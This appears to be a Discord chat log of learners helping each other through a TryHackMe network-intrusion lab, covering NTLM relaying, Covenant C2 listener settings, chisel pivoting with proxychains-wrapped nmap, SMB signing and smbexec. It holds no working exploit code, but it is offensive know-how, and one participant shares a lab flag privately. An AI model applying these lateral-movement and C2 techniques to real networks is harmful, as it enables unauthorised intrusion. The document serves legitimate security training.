@wind bobcat hello, so I finally reached the NTLM relaying part. I was having a problem, can I ask if u are free?
about to sleep, ask away and I'll get to you first thing in the morning
oh I am sorry, goodnight. it worked now, had to log off the users before restarting
I can't access the web server on S-SRV01 under task 27, and can't find any open ports with nmap either
the all-ports scan is going on
and on the default ports 80, 8080 I tried accessing the website but nope
What's the difference in a Covenant listener between the Bind Address port and the Connect port?
Bind address port is the port+address covenant will use to start a listener up (you can use 0.0.0.0 to listen on all interfaces or select a specific one)
The connect address is used as the address the grunts will use to connect and is different in case you want to have the C2 traffic go through a proxy or a redirector of some sorts
did you set up the pivot with sshuttle or chisel?
yup
which one
chisel
then you need to run nmap through that socks proxy from chisel
proxychains <nmap command here>
and ofc change the proxychains config before that
yeah so now you should be able to run nmap through proxychains
for S-SRV01 when we try to reset the password, I just have two users which I got initially from the db dump
I tried both. just don't get the token out of it
hmmm I broke the shell trying to stabilize it at task 13 (admin.holo.live) and I just closed my terminal; now the page at dashboard seems unresponsive. any way to get myself out of that situation?
It uses the PHP session ID to run the dashboard
So if you broke the shell, restart the browser and repeat the steps
It will work
Don’t scan with sshuttle reee
I did that with Nmap + chisel
Oh you used chisel in which case szy already answered
TLDR don’t heckin scan over a proxy bad bad bad
.
I am stuck on this where we are supposed to get a token from reset password
thank you good sir
Gave +1 Rep to @radiant spindle
I went in the network but didn't have users
All I got was user not found and the token was blank
Did you try the other user
I got SMB signing enabled on .30?
It is normal?
|_ Message signing enabled but not required
I didn’t set up any of that side of the infra so I’m not sure but I assume it’s intended as there is a bunch of SMB witchery on that machine
@wind bobcat
yea same for me
also this doesn't work
nvm used smbexec
there's a script running every 60~ seconds to disable it. For whatever reason, it doesn't like being disabled on a DC. I'd wager the script broke itself, or someone rebooted the DC, or the network may have gone to sleep
hey, can you DM me the last flag @wind bobcat ?
I'll DM it on thm, 1 sec
thanks @wind bobcat
Gave +1 Rep to @wind bobcat
how does one use Burp Suite with traffic already going through a proxy?
sent, you'll also want to make sure you answer t47q2 haha